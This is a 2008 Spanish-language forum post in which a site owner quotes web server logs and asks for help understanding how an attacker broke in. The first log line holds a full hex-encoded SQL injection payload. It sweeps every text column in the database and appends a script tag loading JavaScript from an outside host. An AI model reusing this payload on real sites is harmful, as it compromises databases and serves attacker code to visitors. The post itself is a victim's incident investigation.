Tema: Ayuda por favor...
Ver Mensaje Individual
  #31 (permalink)  
Antiguo 01/07/2008, 11:25
Avatar de @padawan@
@padawan@
 
Fecha de Ingreso: julio-2005
Mensajes: 393
Antigüedad: 19 años, 7 meses
Puntos: 6
Respuesta: Ayuda por favor...
Bueno en los logs, he enontrado por donde se meten.

Miren este registro del log:

Cita:

2008-06-29 19:33:08 W3SVC7494 MISERVIDOR 67.xxx.xxx.xxx GET /ficha.asp Id=66506;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAS T(0x4445434C41524520405420564152434841522832353529 2C404320564152434841522832353529204445434C41524520 5461626C655F437572736F7220435552534F5220464F522053 454C45435420612E6E616D652C622E6E616D652046524F4D20 7379736F626A6563747320612C737973636F6C756D6E732062 20574845524520612E69643D622E696420414E4420612E7874 7970653D27752720414E442028622E78747970653D3939204F 5220622E78747970653D3335204F5220622E78747970653D32 3331204F5220622E78747970653D31363729204F50454E2054 61626C655F437572736F72204645544348204E455854204652 4F4D205461626C655F437572736F7220494E544F2040542C40 43205748494C4528404046455443485F5354415455533D3029 20424547494E20455845432827555044415445205B272B4054 2B275D20534554205B272B40432B275D3D525452494D28434F 4E5645525428564152434841522834303030292C5B272B4043 2B275D29292B27273C736372697074207372633D687474703A 2F2F7777772E616477737570702E636F6D2F622E6A733E3C2F 7363726970743E27272729204645544348204E455854204652 4F4D205461626C655F437572736F7220494E544F2040542C40 4320454E4420434C4F5345205461626C655F437572736F7220 4445414C4C4F43415445205461626C655F437572736F7220%2 0AS%20VARCHAR(4000));EXEC(@S);--|-|ASP_0113|Script_timed_out 80 - 201.242.212.219 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CL R+2.0.50727) - - www.misitio.com 500 0 1236 0 1415 459265
Creo que el error que cometi es que no estaba aplicando un filtro de cadena a las variables de tipo numericos. Veo que por aqui se metieron.

ahora miren este otro registro de log que es el que le sigue:

Cita:

2008-06-29 19:33:08 W3SVC7494 MISERVIDOR67.xxx.xxx.xxxGET /Images/<script+src=http:/www.adwsupp.com/b.js></script><script+src=http:/www.adwsupp.com/b.js></script><script+src=http:/www.adwsupp.com/b.js></script><script+src=http:/www.adwsupp.com/b.js></script> - 80 - 200.122.78.101 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+InfoPat h.2;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.30) ASPSESSIONIDCSRSDSQA=BDBLJBDDCIGBKENFPLIONMBM http://www.misitio.com/Busqueda.asp?...apital+Federal www.misitio.com 404 2 1260 1795 695 265
No interpreto bien este log, la cadena de "< script " es la que se inserta en la base de datos , pero pareciera que la mete en un directorio de imagenes, como puedo interpretar esto? especificamente que es lo que hace?

Gracias por la ayuda!